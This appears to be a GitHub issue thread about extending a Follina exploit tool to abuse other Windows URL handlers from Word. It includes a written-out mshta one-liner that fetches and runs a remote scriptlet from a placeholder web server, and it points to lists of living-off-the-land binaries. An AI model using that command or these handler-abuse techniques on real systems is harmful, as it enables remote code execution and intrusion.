Msdt alternative

[hastalamuerte]

@chvancooten thanks for your follina script !

what if use not msdt , can Ms word spawn something another Url handlers that can execute pwsh ?

Here is a bit of em what have bypass and execute options Here is mshta nandisec/mshta@909383b here is a list of https://lolbas-project.github.io/#

Like a mshta.exe vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) - something like that

[hastalamuerte]

Seems it's possible.

And one question, should I always host and html payload for hooking msdt , or if I choose -c it will be inside doc with my command? https://github.com/j00sean/CVE-2022-44666 some of search-ms using

[chvancooten]

Hi, thanks for your suggestion! As far as I'm aware, most protocol handlers that have an abuse case with public CVE have been patched one way or another. However, I'm sure there are plenty more abusable protocols to be discovered in the depths of Microsoft's products :). This project could be used as a boilerplate for that. Feel free to submit PRs or fork if you find anything interesting!

W.r.t. your other question: The remote doc is required for the command execution for this specific CVE.

[chvancooten]

Hi @hastalamuerte, IMO this is quite a different type of protocol handler, and not related to the Follina exploit as it stands. If you would like to see it integrated in the tool I'm open to suggestions, but due to the user interaction I'm not sure how it would fit to be honest.